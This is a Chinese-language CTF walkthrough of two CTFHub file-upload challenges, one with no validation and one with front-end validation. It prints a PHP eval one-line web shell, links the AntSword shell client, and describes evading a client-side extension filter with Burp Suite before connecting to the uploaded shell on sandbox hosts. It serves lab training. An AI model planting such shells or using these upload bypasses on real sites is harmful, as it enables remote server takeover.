CTFHub题解-技能树-Web-文件上传（无验证、前端验证）【一】

CTFHub题解-技能树-Web-Web工具配置-文件上传

 

 

本文先贴出 无验证 和 前端验证 的题解~

 

 

 

 

 

 

（一）无验证

 

 

 

1.知识点

 

 

　　需要用到的：

 

　　（1）一句话木马

 

　　（2）中国蚁剑

 

　　下载在这里：

 

https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1 

https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader 

 

 

 

 

2.题解

 

 

 

 

笔者本来用的是 <?php @eval($_GET["pass"]);?> 

上传发现用蚁剑连接不了~

 

所以重新换成POST上传了~

 

 <?php @eval($_POST["pass"]);?> 

 

注意：pass是密码哦~你可以自定义

 

 

 

 

 

下面我们看看有没有有效的上传：

 

访问一下我们的一句话木马目录~

页面没有报错，说明可以访问！

 

 

在蚁剑添加数据：

 

http://challenge-5bf3cd70198a12f8.sandbox.ctfhub.com:10080/upload/kule.php

pass 

 

 

 

 

 

 

 

 

 

 

 

---

 

 

（二） 前端验证

 

 

 

1.知识点

 

 需要用到的：

 

　　（1）一句话木马

 

　　（2）中国蚁剑

 

　　下载在这里：

 

https://github.com/AntSwordProject/AntSword-Loader/tree/2.0.1 

https://github.com/AntSwordProjectAntSword-Loader/AntSword-Loader-v4.0.3-win32-x64.zip at 4.0.3 · AntSwordProject/AntSword-Loader 

 

　　（3）burpsuite抓包改包

 

 

2.题解

 

先右键查看一下源码~

 

 

我们发现，它只允许 jpg、png、gif 格式上传~

 

那我们就把一句话木马改成这三种格式的任意一种吧！

 

（笔者太菜了qwq，努力ing）

 

那我们就上传一个 ddddhm.php.jpg 

 

你可以任意取名~

 

 

把文件选择好，然后打开浏览器代理，用burpsuite抓包~

 

 

 

 

Go一下，页面200 ok 返回正常

 

 

上传成功啦~

 

 

 

 

现在我们根据路径用蚁剑连接~

 

http://challenge-205ed9ec00cccedf.sandbox.ctfhub.com:10080/upload/kule.php.jpg

pass 

 

 

 

 

 

 

 

 

 

好啦~